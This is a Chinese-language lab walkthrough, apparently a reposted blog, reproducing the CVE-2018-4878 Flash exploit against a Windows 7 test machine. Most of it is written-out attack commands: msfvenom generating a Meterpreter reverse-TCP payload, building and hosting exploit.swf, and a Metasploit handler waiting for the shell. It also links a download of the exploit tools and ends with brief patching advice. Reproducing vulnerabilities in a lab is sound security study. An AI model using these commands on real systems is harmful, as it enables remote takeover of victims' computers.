[漏洞复现] CVE-2018-4878 Flash 0day

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[漏洞复现] CVE-2018-4878 Flash 0day相关的知识,希望对你有一定的参考价值。

1、漏洞概述

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。


攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。


直到2018年2月5号,Adboe才发布补丁来修复此0 day漏洞。

技术分享图片

互联网上出现的基于此Flash 0day漏洞进行攻击的样本,其实在2017年底就已经由韩国计算机应急小组(KR-CERT)首次发现。


目前,全网已经有比较成熟的针对此Flash漏洞的利用代码,接下来,我们为大家复现整个过程。


2、漏洞复现环境

Kali Linux + Windows 7 sp1 
渗透机:Kali Linux (ip:172.16.70.216) 
靶机:Windows 7 sp1 (ip:172.16.70.199) 
exp:cve-2018-4878.py 
flash:flashplayer_activex_28.0.0.137.exe

注:此实验环境所用渗透机和靶机,跟之前文章所分享一致。为了节省大家实验时间,我将此实验涉及到的工具全部上传到网盘=> 
链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0 

技术分享图片


3、实验流程

①将网盘中的CVE-2018-4878-master目录下载下来,并放入Kali Linux桌面

技术分享图片

②使用msfvenom生成shell代码

生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 

[email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.70.216 lport=8888  -f  python>shellcode.txt 

技术分享图片

查看代码文件 
[email protected]:~# cat shellcode.txt 

技术分享图片

③进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件

将上面msfvenom生成的代码覆盖掉原来的代码:

技术分享图片


修改CVE-2018-4878.py下面的文件信息(后面会用到,之后保存修改退出): 

技术分享图片


④Kali Linux进入CVE-2018-4878-master路径,用Python执行CVE-2018-4878-master.py代码

[email protected]:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py 
[email protected]:~/Desktop/CVE-2018-4878-master# ls -l 

技术分享图片

⑤Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(apache web路径)

[email protected]:~/Desktop/CVE-2018-4878-master# service apache2 start 
[email protected]:~/Desktop/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html 
[email protected]:~/Desktop/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf 

技术分享图片

此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。

⑥Kali Linux开启Shell会话监听

使用handler监听模块 
msf > use exploit/multi/handler 
回弹一个tcp连接 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
设置kali渗透机的ip地址 
msf exploit(handler) > set lhost 172.16.70.216 
设置监听端口,这个需跟上面msfvenom设置的端口一致 
msf exploit(handler) > set lport 8888 
开启监听,等待肉鸡上线 
msf exploit(handler) > exploit

技术分享图片

⑦Windows7 安装flash插件,并用IE浏览器访问页面

搜索flash最新的28版本 

技术分享图片


安装flash插件 

技术分享图片


使用Win7内置IE 8浏览器访问页面:http://172.16.70.216/index2.html 

技术分享图片


⑧Kali Linux 上获取meterpreter shell,并进行管理

技术分享图片

技术分享图片


实验总结: 

可以看到,最终由于Flash存在CVE-2018-4878这个高危漏洞,导致Windows靶机访问含flash的页面时,直接被Kali Linux控制。 

真实环境下,很多黑客基于此Flash漏洞,结合社会工程学,例如将网页链接放置在诱导邮件中,欺骗大量用户点击,来达到最规模攻击效果。

在这里也呼吁大家:平常要非常小心陌生链接,类似这种“一点就中招”的高级渗透攻击,肯定还有很多没有浮出水面。像这个2017年其实已经出现的漏洞,早就有黑客已经在使用了,而中招者完全不知情,整个攻击手法非常隐蔽。而2018年2月才有安全补丁,在这期间,有多少肉鸡被控制,这个难以想象。很多0day漏洞,黑客比大部分人都要提前知晓,在安全厂商没有出安全公告,或者没有打安全补丁的情况下,一个不小心,就会导致电脑被劫持,数据被窃取,造成极大的损失。


4、漏洞修复

①直接到Adobe Flash官网,下载最新版本:https://get.adobe.com/cn/flashplayer/ 
②安装常见杀毒软件,开启实时防护和杀毒引擎实时升级。



相关推文:

[漏洞复现] MS17-010 基于"永恒之蓝"实现Windows Getshell

[漏洞复现] CVE-2017-11882 通杀所有Office版本

[漏洞复现] CVE-2017-16995 Ubuntu16.04


以上是关于[漏洞复现] CVE-2018-4878 Flash 0day的主要内容,如果未能解决你的问题,请参考以下文章

Xmind XSS导致RCE漏洞复现

CVE-2020-15778漏洞复现

JWT漏洞复现

vulhub Weblogic SSRF漏洞 复现

[漏洞复现]Tomcat漏洞复现

Apache文件解析漏洞复现,CVE-2017-15715复现,Apache多后缀解析漏洞复现